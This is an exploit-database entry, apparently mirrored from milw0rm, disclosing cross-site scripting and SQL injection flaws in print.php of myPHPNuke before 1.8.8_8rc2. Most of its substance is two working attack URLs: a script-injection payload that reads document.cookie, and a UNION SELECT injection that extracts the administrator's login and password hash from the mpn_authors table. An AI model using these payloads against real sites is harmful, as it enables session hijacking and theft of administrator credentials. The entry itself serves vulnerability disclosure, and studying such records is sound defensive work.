[] NeoSense
E X P L O I T S
title author type platform port cve id

myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection

Author: MustLive
type: webapps
platform: php
port: 
date_added: 2008-08-30 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-54077;CVE-2008-4089;OSVDB-48167;CVE-2008-4088 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commpn188_final_7.zip
############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2391/

Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).

############################################################

# milw0rm.com [2008-08-31]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.